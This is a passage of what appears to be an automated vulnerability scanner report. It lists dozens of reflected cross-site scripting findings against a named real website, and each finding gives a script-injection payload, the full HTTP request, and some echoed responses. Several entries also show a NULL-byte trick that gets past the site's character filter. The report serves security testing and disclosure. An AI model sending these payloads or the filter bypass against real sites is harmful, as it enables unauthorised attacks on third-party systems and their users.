The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e36f"><script>alert(1)</script>c1f54d8e812 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mortgages8e36f"><script>alert(1)</script>c1f54d8e812 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79cc0"><script>alert(1)</script>c2e171a7c39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mortgages79cc0"><script>alert(1)</script>c2e171a7c39/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d97b3"><script>alert(1)</script>4b8a48dd4ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mortgagesd97b3"><script>alert(1)</script>4b8a48dd4ef/refinancing HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004efb0"><script>alert(1)</script>2dd294d4521 was submitted in the REST URL parameter 2. This input was echoed as 4efb0"><script>alert(1)</script>2dd294d4521 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /mortgages/refinancing%004efb0"><script>alert(1)</script>2dd294d4521 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:51:27 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999961 Connection: Keep-Alive Content-Type: text/html Content-Length: 35379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/mortgages/refinancing%004efb0"><script>alert(1)</script>2dd294d4521/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2063"><script>alert(1)</script>f60b05c043d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /recallsb2063"><script>alert(1)</script>f60b05c043d HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1f62"><script>alert(1)</script>9c356f694cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /recessiond1f62"><script>alert(1)</script>9c356f694cf HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d9b4"><script>alert(1)</script>7b033058fa1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /retirement7d9b4"><script>alert(1)</script>7b033058fa1 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1ffd"><script>alert(1)</script>8152f8dfc89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /retirementc1ffd"><script>alert(1)</script>8152f8dfc89/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1965f"><script>alert(1)</script>b1379ff0c56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials1965f"><script>alert(1)</script>b1379ff0c56 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bb4a"><script>alert(1)</script>24b3176fe0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes6bb4a"><script>alert(1)</script>24b3176fe0b HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes6bb4a"><script>alert(1)</script>24b3176fe0b/"/> ...[SNIP]...
1.734. http://www.walletpop.com/taxes [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.walletpop.com
Path:
/taxes
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3276c"><script>alert(1)</script>bfe4d36dc5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes?3276c"><script>alert(1)</script>bfe4d36dc5b=1 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 752da"><script>alert(1)</script>a51d1f99850 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes752da"><script>alert(1)</script>a51d1f99850/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes752da"><script>alert(1)</script>a51d1f99850/"/> ...[SNIP]...
1.736. http://www.walletpop.com/taxes/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.walletpop.com
Path:
/taxes/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a8f3"><script>alert(1)</script>895d57e05f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/?6a8f3"><script>alert(1)</script>895d57e05f=1 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccf25"><script>alert(1)</script>fd247453795 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxesccf25"><script>alert(1)</script>fd247453795/advice HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a6b4c"><script>alert(1)</script>89b67810fa1 was submitted in the REST URL parameter 2. This input was echoed as a6b4c"><script>alert(1)</script>89b67810fa1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/advice%00a6b4c"><script>alert(1)</script>89b67810fa1 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:51:35 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999914 Connection: Keep-Alive Content-Type: text/html Content-Length: 35349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes/advice%00a6b4c"><script>alert(1)</script>89b67810fa1/"/> ...[SNIP]...
1.739. http://www.walletpop.com/taxes/advice [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.walletpop.com
Path:
/taxes/advice
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 171d1"><script>alert(1)</script>13a164dad11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/advice?171d1"><script>alert(1)</script>13a164dad11=1 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a7ee"><script>alert(1)</script>96a2598453f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes1a7ee"><script>alert(1)</script>96a2598453f/advice/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f5ece"><script>alert(1)</script>c74704fcc55 was submitted in the REST URL parameter 2. This input was echoed as f5ece"><script>alert(1)</script>c74704fcc55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/advice%00f5ece"><script>alert(1)</script>c74704fcc55/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:51:29 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999959 Connection: Keep-Alive Content-Type: text/html Content-Length: 35352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes/advice%00f5ece"><script>alert(1)</script>c74704fcc55/"/> ...[SNIP]...
1.742. http://www.walletpop.com/taxes/advice/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.walletpop.com
Path:
/taxes/advice/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efc20"><script>alert(1)</script>1eac2732ded was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/advice/?efc20"><script>alert(1)</script>1eac2732ded=1 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d975d"><script>alert(1)</script>c9b1aece5a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/articled975d"><script>alert(1)</script>c9b1aece5a7/10-most-common-tax-mistakes-to-avoid/888611 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7018a"><script>alert(1)</script>83874f2a097 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/article/10-most-common-tax-mistakes-to-avoid7018a"><script>alert(1)</script>83874f2a097/888611 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de38a"><script>alert(1)</script>7f8353795a0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/article/10-most-common-tax-mistakes-to-avoid/888611de38a"><script>alert(1)</script>7f8353795a0 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bef7b"><script>alert(1)</script>f949f1f57f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxesbef7b"><script>alert(1)</script>f949f1f57f2/basics HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0079946"><script>alert(1)</script>0a2e7e95fa4 was submitted in the REST URL parameter 2. This input was echoed as 79946"><script>alert(1)</script>0a2e7e95fa4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/basics%0079946"><script>alert(1)</script>0a2e7e95fa4 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:51:34 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999967 Connection: Keep-Alive Content-Type: text/html Content-Length: 35351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes/basics%0079946"><script>alert(1)</script>0a2e7e95fa4/"/> ...[SNIP]...
1.748. http://www.walletpop.com/taxes/basics [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.walletpop.com
Path:
/taxes/basics
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eaf5"><script>alert(1)</script>fbddcc9eb8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/basics?7eaf5"><script>alert(1)</script>fbddcc9eb8b=1 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a386b"><script>alert(1)</script>855cf0b17f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxesa386b"><script>alert(1)</script>855cf0b17f3/basics/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f181f"><script>alert(1)</script>68ec6be0af4 was submitted in the REST URL parameter 2. This input was echoed as f181f"><script>alert(1)</script>68ec6be0af4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/basics%00f181f"><script>alert(1)</script>68ec6be0af4/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:51:28 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999995 Connection: Keep-Alive Content-Type: text/html Content-Length: 35352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes/basics%00f181f"><script>alert(1)</script>68ec6be0af4/"/> ...[SNIP]...
1.751. http://www.walletpop.com/taxes/basics/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.walletpop.com
Path:
/taxes/basics/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5b9b"><script>alert(1)</script>25c9788e252 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/basics/?d5b9b"><script>alert(1)</script>25c9788e252=1 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28c68"><script>alert(1)</script>cde2c294d4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes28c68"><script>alert(1)</script>cde2c294d4c/credit HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f1bf6"><script>alert(1)</script>16a17c857b4 was submitted in the REST URL parameter 2. This input was echoed as f1bf6"><script>alert(1)</script>16a17c857b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/credit%00f1bf6"><script>alert(1)</script>16a17c857b4 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:51:32 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999900 Connection: Keep-Alive Content-Type: text/html Content-Length: 35351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes/credit%00f1bf6"><script>alert(1)</script>16a17c857b4/"/> ...[SNIP]...
1.754. http://www.walletpop.com/taxes/credit [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.walletpop.com
Path:
/taxes/credit
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 540a1"><script>alert(1)</script>ce8bf8ae5ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/credit?540a1"><script>alert(1)</script>ce8bf8ae5ae=1 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b826"><script>alert(1)</script>0fd5878fd3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes5b826"><script>alert(1)</script>0fd5878fd3c/credit/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009aaa3"><script>alert(1)</script>a360555dfe was submitted in the REST URL parameter 2. This input was echoed as 9aaa3"><script>alert(1)</script>a360555dfe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/credit%009aaa3"><script>alert(1)</script>a360555dfe/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:51:34 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999975 Connection: Keep-Alive Content-Type: text/html Content-Length: 35348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes/credit%009aaa3"><script>alert(1)</script>a360555dfe/"/> ...[SNIP]...
1.757. http://www.walletpop.com/taxes/credit/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.walletpop.com
Path:
/taxes/credit/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99988"><script>alert(1)</script>aee0921a12c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/credit/?99988"><script>alert(1)</script>aee0921a12c=1 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d8d8"><script>alert(1)</script>9e4d2daa341 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes5d8d8"><script>alert(1)</script>9e4d2daa341/forms HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b235b"><script>alert(1)</script>f1977b4d3f9 was submitted in the REST URL parameter 2. This input was echoed as b235b"><script>alert(1)</script>f1977b4d3f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
